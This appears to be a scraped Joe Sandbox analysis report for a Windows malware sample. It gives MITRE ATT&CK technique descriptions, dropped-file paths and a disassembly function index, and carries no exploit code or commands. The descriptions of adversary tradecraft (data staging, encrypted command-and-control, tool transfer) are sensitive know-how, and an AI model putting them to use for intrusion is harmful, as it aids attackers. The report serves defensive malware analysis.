Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7uY105UTJU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jynfofba.l0x.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojigbynz.ka3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u02odyfs.1er.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yikift03.cmb.ps1

C:\Users\user\AppData\Local\Temp\nsr144.tmp\nsExec.dll

C:\Users\user\AppData\Local\Temp\syrians.exe

C:\Users\user\AppData\Local\Temp\syrians.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton

C:\Users\user\AppData\Roaming\erstatningsgraden\Ubekymret\storfavoritters.tid

C:\Users\user\AppData\Roaming\erstatningsgraden\Unlatches.Vel

C:\Users\user\AppData\Roaming\erstatningsgraden\preappearance.glu

C:\Users\user\AppData\Roaming\erstatningsgraden\reaktiv.ove

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
7uY105UTJU.exe

Function 00403532 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON